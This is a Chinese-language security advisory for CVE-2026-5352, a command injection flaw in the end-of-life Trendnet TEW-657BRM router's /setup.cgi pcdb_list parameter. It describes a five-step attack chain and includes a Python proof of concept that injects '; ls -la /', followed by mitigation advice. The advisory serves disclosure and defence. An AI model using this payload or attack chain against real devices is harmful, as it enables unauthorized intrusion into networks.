CVE-2026-5352 Trendnet TEW-657BRM 命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-5352

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Trendnet TEW-657BRM

漏洞概述

Trendnet TEW-657BRM 1.00.1版本被检测出存在严重的安全漏洞。该漏洞位于Web管理接口的/setup.cgi文件中，具体影响Edit功能。攻击者可以通过操纵pcdb_list参数注入恶意操作系统命令。此攻击可远程发起，无需用户交互，成功利用可能导致机密性、完整性和可用性受损。厂商已确认该产品自2011年起停止生命周期维护，且不再提供支持，因此官方不会发布修复补丁。

技术细节

该漏洞的根本原因在于Trendnet TEW-657BRM路由器在处理/setup.cgi的Edit请求时，缺乏对用户输入参数pcdb_list的有效验证。由于程序直接将该参数传递给后台系统Shell执行，且未进行必要的过滤或转义，导致了经典的操作系统命令注入漏洞。攻击者可以轻易注入Shell元字符（如分号或管道符），将恶意指令拼接到原有命令中执行。攻击者仅需具备低权限用户身份即可利用此漏洞。通过构造特定的HTTP POST请求，攻击者能够迫使服务器执行任意系统指令，从而读取敏感文件、上传恶意软件或进一步渗透内网。鉴于产品已停止维护，该风险将持续存在。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或使用Shodan等引擎，寻找暴露在互联网上的Trendnet TEW-657BRM设备，并尝试确认其固件版本为1.00.1。

STEP 2

2. 获取访问权限

攻击者获取设备的Web管理界面访问权限。根据CVSS向量，攻击者需要低权限账户（PR:L），可能通过弱口令猜测或默认凭证获取。

STEP 3

3. 构造恶意请求

攻击者向/setup.cgi端点发送特制的HTTP POST请求，在pcdb_list参数中注入Shell元字符（如; | &&）以及要执行的操作系统命令。

STEP 4

4. 执行注入命令

服务器端CGI脚本接收请求，由于未过滤特殊字符，直接将参数传递给系统Shell执行，导致攻击者的恶意代码在设备上运行。

STEP 5

5. 建立持久化控制

利用执行命令的权限，攻击者可以下载后门程序、修改配置或开启Telnet服务，从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_ip = "192.168.0.1"  # Replace with the actual IP of the vulnerable device
url = f"http://{target_ip}/setup.cgi"

# The vulnerable parameter is 'pcdb_list'.
# We inject a simple command to list directory contents using a semicolon.
payload = {
    "pcdb_list": "; ls -la /",
    "action": "edit"
}

try:
    print(f"[+] Sending exploit payload to {target_ip}...")
    response = requests.post(url, data=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

影响范围

Trendnet TEW-657BRM 1.00.1

防御指南

临时缓解措施

由于Trendnet TEW-657BRM已处于生命周期结束（EOL）状态，官方不会提供安全更新来修复此漏洞。唯一的彻底解决方案是更换为现代且受支持的路由器设备。若必须继续使用，应严格限制对设备管理接口的网络访问，确保其不直接暴露于互联网，并更改默认的管理员凭证为高强度的复杂密码，以增加攻击者获取低权限账户的难度。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5352
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5352
3 Details https://www.cvedetails.com/cve/CVE-2026-5352/
4 VulDB https://vuldb.com/cve/CVE-2026-5352
5 Link https://github.com/panda666-888/vuls/blob/main/trendnet/tew-657brm/edit.md
6 Link https://vuldb.com/submit/781565
7 Link https://vuldb.com/vuln/354705
8 Link https://vuldb.com/vuln/354705/cti